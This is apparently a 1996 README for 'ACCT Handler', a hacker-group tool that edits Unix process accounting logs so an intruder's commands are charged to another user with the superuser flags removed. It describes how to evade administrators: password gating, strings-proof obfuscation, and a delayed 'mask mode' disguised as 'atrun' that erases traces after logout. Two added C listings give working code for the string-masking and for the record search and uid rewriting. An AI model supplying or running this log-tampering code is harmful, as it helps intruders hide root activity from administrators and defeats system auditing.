 #### ACCT Handler v1.0 beta #### 
 #### By Zhart/THC  (c) 1996 #### 

Features: 
          - Fast handling of very large acct files.
          - Multiple levels of security for nosy admins 
              (passworded and "strings" proof).
          - Covers last commands before logout    [mask mode]
              (the program itself and the shell)
          - Works.
          
What it does, in two words:  (in case "ACCT Handler" doesn't tell you anything)
  Edits the process accounting file (typically /var/adm/acct), changing
  the given user id to another one and removing the SuperUser flags.


 [- Introduction -]

The program works in two modes: - from command line
                                - interactively
 
Here is the command line help:

Usage: <progname> -u user -f user [-t time]/[-b] [-p command] [-h]
-u user_login     (necessary) User to hide
-f user_login     (necessary) User to fake
-t hh:mm dd/mm/yy (if not -b) Start editing from this date
-b                (if not -t) Start editing from file's beginning
-p command_name    (optional) Fake the user only for this command
-m                 (optional) CountDown Mask mode
-h                            This help and exit
If NO arguments are given, the program acts in interactive mode

Arguments can be given in any order.
If neither "-t" nor "-b" is given, the program's behaviour is undefined.
If "-u" and/or "-f" are not given, the program uses the defaults defined
at compilation time.
If the real and the fake user are the same, the only effect is that the
SuperUser flags are removed.
Command line mode is particularly useful for scripts;
in a later version I'll change the date/time format to a more standard one,
to make scripting easier.
(Honestly, you can do this yourself, it isn't difficult; I swear.)


 [- The time facility -]
   
The first (and most important) difference from other programs which handle
acct logging is the time option. The process accounting file, which we will
call ACCT, differs from other log files in how fast it grows: an ACCT is
generally several Mbytes large, so keeping such a file open in write mode
for a long time could lead to unpleasant surprises; above all, scanning an
entire ACCT takes far too long on a multitasking system (and it is simply
useless to scan a file that starts 3-4 days ago when you want to cover the
commands of the last twenty minutes).
This is where the time facility helps:
  The program prints the date and time of the first and last records in the ACCT.
  The user picks the time from which scanning/editing should start.
  The program, starting from the end of the file, walks backwards through it
   a pre-defined number of records at a time (each step is the size of one
   acct record) until it finds a record dated earlier than the selected time.
   This phase is done with lseek, so it is very fast.
  Then the program starts a second search, reading one record at a time,
  and stops at the first record dated at or after the selected time.
  At this point the scanning/editing phase begins.

If the ACCT file is not very large, if you intentionally want to edit it
from the beginning, or if you simply don't like this option, the program can
also work in normal mode, scanning/editing from the beginning of the file.
From the command line this is done with the "-b" option; in interactive mode
you will simply be asked, right after the program has printed the ACCT start
and end dates.
At the moment, if you enter an invalid date/time, the behaviour is undefined.
NOTE: The time option [obviously] also selects (approximately) the part of the
      acct file which gets edited... if you use an account that is still used
      by others you can't change all of its entries in the acct file: it would
      be noticed very soon!


 [- Security -]

The program features 3 different levels of security, depending on your
degree of paranoia.
The first level of (in-)security is using it as it is: everyone who runs it
will probably understand what it is and can also ask for help with the "-h"
option; so it's up to you to keep the file away from other eyes.
A reasonable level of security (the second one) is set by compiling the
program with:
#define PWD 1
This makes the program wait for a password if started without arguments,
and simply exit if invoked with the "-h" option; both without printing
any message.
The password is stored in the "vWd()" procedure; if you can't find it or
change it, turn off the computer and consider doing something more productive.
The third level (which will probably be used together with the second)
is set by commenting out (or simply deleting) this line:

#define SHOW    /* blah blah ... blah .. blah blah   blah blah  */

like this:

/* #define SHOW     blah blah ... blah .. blah blah   blah blah  */

This way the program compiles without any string that explicitly refers to
evil things or to "acct" handling. So if someone runs
# strings prog_name | more
he finds nothing more than some strings about the dates of a file.
For the same reason, global variables and procedures have unsuspicious
names, and the location of the ACCT file is stored with the same method as
the program password, to make it "strings" proof.
This security enhancement makes the program less user-friendly, but it
survives a casual look with "strings". Keep in mind what it does NOT do:
the decoded password and path exist in memory while the program runs, and
anyone who disassembles the binary, traces its system calls or reads its
memory will still see them; it defeats "strings", not a determined analyst.
I've often found sysadmins who randomly looked at users' binaries with the
"strings" command, so I don't think it's useless; it's your choice.
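Added example (not the ACCT Handler code; the real "vWd()" is not on this page) of the storage method the Security section describes: the secret is kept as a masked byte table with no printable run for "strings" to find, and rebuilt in a buffer only when needed. The mask (0xAA plus the byte index), the function names and the sample password are this example's own choices.

```c
/* Added example, not the ACCT Handler source: keep a secret literal (the
 * password or the ACCT path) out of the binary's printable-string table by
 * storing it XOR-masked and rebuilding it only when needed. The mask
 * (0xAA + index) and the helper names are this example's own choices. */
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* "/var/adm/acct" masked byte-by-byte with (0xAA + i). For secrets shorter
 * than 86 bytes every masked byte is >= 0x80, so no printable run remains. */
static const unsigned char ACCT_PATH_ENC[] = {
    0x85, 0xDD, 0xCD, 0xDF, 0x81, 0xCE, 0xD4, 0xDC, 0x9D, 0xD2, 0xD7, 0xD6, 0xC2
};

/* Build-time helper: produces a table like the one above. The plaintext
 * literal belongs only here, never in the shipped binary. */
static size_t mask(const char *plain, unsigned char *out, size_t cap)
{
    size_t n = strlen(plain);
    if (n == 0 || n > cap) return 0;
    for (size_t i = 0; i < n; i++)
        out[i] = (unsigned char)plain[i] ^ (unsigned char)(0xAA + i);
    return n;
}

/* Rebuild the plaintext into `out` (cap includes the NUL); returns 0 on overflow. */
static size_t unmask(const unsigned char *enc, size_t n, char *out, size_t cap)
{
    if (n + 1 > cap) return 0;
    for (size_t i = 0; i < n; i++)
        out[i] = (char)(enc[i] ^ (unsigned char)(0xAA + i));
    out[n] = '\0';
    return n;
}

/* Zero a buffer in a way the optimizer may not drop as a dead store. */
static void wipe(char *buf, size_t n)
{
    volatile char *p = buf;
    while (n--) *p++ = 0;
}

/* What "strings" reports by default: a run of at least 4 printable ASCII bytes. */
static int strings_visible(const unsigned char *b, size_t n)
{
    size_t run = 0;
    for (size_t i = 0; i < n; i++) {
        run = (b[i] >= 0x20 && b[i] < 0x7F) ? run + 1 : 0;
        if (run >= 4) return 1;
    }
    return 0;
}

/* Check `typed` against a masked password: unmask into a stack buffer, compare
 * every byte (no early exit on the first mismatch) and wipe the plaintext. */
static int password_ok(const unsigned char *enc, size_t n, const char *typed)
{
    char buf[64];
    unsigned char diff = 0;
    if (unmask(enc, n, buf, sizeof buf) == 0) return 0;
    if (strlen(typed) != n) { wipe(buf, sizeof buf); return 0; }
    for (size_t i = 0; i < n; i++) diff |= (unsigned char)(buf[i] ^ typed[i]);
    wipe(buf, sizeof buf);
    return diff == 0;
}

/* Demo driver: mask `stored` as the build-time tool would, then verify `typed`. */
static int check_password(const char *stored, const char *typed)
{
    unsigned char enc[64];
    size_t n = mask(stored, enc, sizeof enc);
    return n != 0 && password_ok(enc, n, typed);
}

/* Self-check (not for the shipped binary): the table unmasks to `expect` and
 * re-masking `expect` reproduces it byte for byte. */
static int path_table_ok(const char *expect)
{
    char plain[64]; unsigned char again[64];
    size_t n = unmask(ACCT_PATH_ENC, sizeof ACCT_PATH_ENC, plain, sizeof plain);
    int ok = n != 0 && strcmp(plain, expect) == 0 &&
             mask(expect, again, sizeof again) == sizeof ACCT_PATH_ENC &&
             memcmp(again, ACCT_PATH_ENC, sizeof ACCT_PATH_ENC) == 0;
    wipe(plain, sizeof plain);
    return ok;
}

int main(void)
{
    printf("masked path visible to strings: %d\n",
           strings_visible(ACCT_PATH_ENC, sizeof ACCT_PATH_ENC));
    printf("password check: %d %d\n", check_password("s3cret", "s3cret"),
           check_password("s3cret", "s3cres"));
    return 0;
}
```

strings_visible() mirrors the default minimum run length of 4 that "strings" uses, so checking the masked table with it is the same check an admin would run. The plaintext still exists in memory between unmask() and wipe(), which is exactly the window a debugger or a ptrace-based tracer would use; the method hides literals from a static look, nothing more.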


 [- Countdown Mask Mode -]

This feature really allows you to act without leaving traces!
The problem with acct cleaning has always been that the program couldn't mask
itself and/or couldn't mask the commands that terminate right before
logout (typically the shell)
[as you should know, acct logs a command only when it has finished
running, so if you run the cleaner and log off, at least your shell and
the cleaner will be logged].
My solution is this:
  - Give the "ACCT Handler" an unsuspicious name like "atrun" (pick something
    that legitimately runs as root without a tty on that host)
  - use the "-m" mask flag from the command line:

    # ./atrun -u evil -f good -t time -m > /dev/null &
    # logout

This way the program waits a defined time before it starts editing the
ACCT file, so that you can log out and your processes can terminate.
(If your shell sends SIGHUP to background jobs on logout, start it with
nohup, or it will die before the countdown ends.)
The program will then clean *all* of your processes from the ACCT, assigning
them to another user and removing the SuperUser flags.
Only the record of the program itself remains, and it looks like this:
atrun            S     root     __        132   0.33 secs Thu Oct 11 12:23:21
                      ^^^^^^  ^^^^^^
The record is charged to root because, when called with the "-m" flag, the
program sets its uid to root. And the process has no tty, just like the real
atrun, because you have logged off.
As you can see, this line is completely unsuspicious.
[If you are so paranoid that you want it placed far away from your commands,
you can add another "sleep(your_choice)" in the main procedure, after the
ACCT file has been closed.]

The countdown time to wait before editing the file is set by this line:
#define COUNTD 20
and is expressed in seconds.


 [- Configuration -]

You must "#undef LINUX" or comment out the "#define LINUX" line if you're
compiling the program on a non-Linux box.
Then verify that the acct file is in "/var/adm/acct"; otherwise you have to
change the string "filename" in the "main" procedure.

You can set the default user ids of the user you want to hide and of the user
you want to show, stored in the variables "u_uid" & "f_uid"; these are used
when the "-f" and/or "-u" options are omitted while "-b" or "-t" are used.

You can set the number of records the program jumps at a time in the
fast-search phase by defining the pre-processor variable STEPS:
#define STEPS 500
Choose it by experimenting: compare the dates reported by the program
(fast-search/slow-search) with the time taken to reach typical targets
(it depends on the ACCT file's size).
[ Beware that giving a starting time (when running the program) which is
relatively close (how close depends on STEPS) to the file's start time can
cause problems (typically the program exits without doing anything), since
a backward jump of STEPS records can land before the start of the file.
So, in this case, it's better (and more logical) to use the "beginning"
option. ]
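As an added example, not the ACCT Handler source (which is not on this page), here is the two-phase search described in the time facility section together with the rewrite loop behind "-u", "-f" and "-p", including a clamp at record 0 for the start-time-near-the-beginning case the note above warns about. The record layout `struct rec`, the flag bit `AFLAG_SU`, the uids and the sample file are constructed stand-ins for the platform's `struct acct` and a real ACCT; on a real system the layout comes from <sys/acct.h> and differs between Linux, Ultrix and System V.

```c
/* Added example, not the ACCT Handler source. `struct rec` is a constructed
 * stand-in for the platform's struct acct (sys/acct.h); real layouts differ. */
#include <stdio.h>
#include <stdint.h>
#include <string.h>
#define STEPS    4      /* records per backward jump (the README suggests 500) */
#define AFLAG_SU 0x02   /* assumed bit for the "superuser" accounting flag */

struct rec {
    uint32_t uid;       /* user the process is charged to */
    uint32_t btime;     /* process start time, seconds */
    uint8_t  flag;      /* accounting flags */
    char     comm[15];  /* command name */
};
#define RS ((long)sizeof(struct rec))

/* Phase 1 (fast): from the end, jump back STEPS records at a time until a
 * record older than `since` is seen, clamping at record 0 instead of seeking
 * to a negative offset. Phase 2 (slow): read forward one record at a time.
 * Returns the index of the first record with btime >= since, or -1. */
static long find_start(FILE *fp, uint32_t since)
{
    struct rec r; long pos;
    if (fseek(fp, 0, SEEK_END) != 0) return -1;
    pos = ftell(fp) / RS;                   /* number of records in the file */
    for (;;) {
        pos -= STEPS;
        if (pos <= 0) { pos = 0; break; }   /* ran off the front: clamp */
        fseek(fp, pos * RS, SEEK_SET);
        if (fread(&r, RS, 1, fp) != 1) return -1;
        if (r.btime < since) break;
    }
    fseek(fp, pos * RS, SEEK_SET);
    while (fread(&r, RS, 1, fp) == 1) {
        if (r.btime >= since) return pos;
        pos++;
    }
    return -1;                              /* nothing at or after `since` */
}

/* From record `start` on, charge every record of uid `hide` to uid `fake` and
 * clear the superuser flag; with `only` set, touch just that command (-p). */
static int relabel(FILE *fp, long start, uint32_t hide, uint32_t fake,
                   const char *only)
{
    struct rec r; long pos = start; int changed = 0;
    if (start < 0) return 0;
    fseek(fp, start * RS, SEEK_SET);
    while (fread(&r, RS, 1, fp) == 1) {
        if (r.uid == hide &&
            (only == NULL || strncmp(r.comm, only, sizeof r.comm) == 0)) {
            r.uid = fake;
            r.flag &= (uint8_t)~AFLAG_SU;
            fseek(fp, pos * RS, SEEK_SET);  /* back up one record, overwrite */
            fwrite(&r, RS, 1, fp);
            changed++;
        }
        pos++;
        fseek(fp, pos * RS, SEEK_SET);      /* stdio: seek between write and read */
    }
    return changed;
}

/* Constructed sample ACCT: n records with btime t0..t0+n-1; every third
 * record belongs to uid 1001 (the user to hide), every sixth is "atrun". */
static int make_sample(const char *path, int n, uint32_t t0)
{
    FILE *fp = fopen(path, "wb");
    if (!fp) return -1;
    for (int i = 0; i < n; i++) {
        struct rec r = {0};
        r.uid   = (i % 3 == 0) ? 1001 : 500;
        r.btime = t0 + (uint32_t)i;
        r.flag  = (i % 2) ? AFLAG_SU : 0;
        strncpy(r.comm, (i % 6 == 0) ? "atrun" : "sh", sizeof r.comm);
        fwrite(&r, sizeof r, 1, fp);
    }
    return fclose(fp);
}

/* Build the sample, then do the equivalent of "-u 1001 -f 500 -t since [-p only]".
 * A second pass must rewrite nothing; -2 means some record was missed. */
static int run_demo(const char *path, uint32_t since, const char *only)
{
    FILE *fp; int changed;
    if (make_sample(path, 20, 1000) != 0) return -1;
    if ((fp = fopen(path, "r+b")) == NULL) return -1;  /* update mode, no truncation */
    changed = relabel(fp, find_start(fp, since), 1001, 500, only);
    if (relabel(fp, find_start(fp, since), 1001, 500, only) != 0) changed = -2;
    fclose(fp);
    return changed;
}

int main(void)
{
    printf("records rewritten: %d\n", run_demo("/tmp/acct_demo.bin", 1010, NULL));
    return 0;
}
```

With STEPS set to 4 and a 20-record sample, a start time of 1010 takes three backward jumps (to records 16, 12 and 8) before the forward scan lands on record 10; a start time at or before the first record clamps to 0 and edits the whole file, which is what "-b" does directly. Running the pass twice and checking that the second pass rewrites nothing is a cheap way to confirm that no record of the hidden user survived in the selected window.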

You can set the security options as explained in the Security section. 


 [- Last words -]

Testing & Feedback:

This program was basically tested on Linux ... some testing has been done on
Ultrix and System V, so everything should go fine; if not, contact me and
tell me what went wrong (obviously with some detailed information about
the problem and the OS).
Any kind of feedback is welcome, especially new ideas, harsh critiques
of my programming and insults ...
At the moment no e-mail addresses are available, so for any contact you
can reach me on LorE bbs +49-69-823282 ... Guest account to leave
messages: login:THC passwd:THC

Forthcoming:

   - Dumping an ACCT file to a text form for editing, and reassembling it.
   - Possibility of completely nuking records.
   
Greets/Thanks:

vanHauser:          Thanx for beta-testing  
The Foolish Group:  From "lupo" to everybody ....( ernesto, la mamma, la 
                      sorella ....)



This program was somehow inspired by "cloak2".


